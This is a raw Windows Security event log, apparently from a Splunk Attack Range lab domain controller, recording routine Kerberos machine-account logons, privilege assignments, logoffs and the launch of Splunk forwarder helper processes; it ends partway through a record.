Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264676
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84EFC3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53577
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:28:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264675
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84EFC3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264689
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84F8FA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264688
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84F9E8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264687
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84FA30
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264686
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84FAAC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53583
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264685
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84FAAC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264684
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84FA30
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53582
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264683
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84FA30
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264682
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84F9E8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264681
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84F9E8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264680
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84F8FA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53581
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264679
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84F8FA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264678
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264691
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1858
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264690
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1698
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264692
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x185c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264693
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264695
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1288
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264694
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17b4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264696
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84FAAC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264699
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x852EC3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264698
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x852EC3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53593
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264697
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x852EC3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:30:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264700
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x138c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264702
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
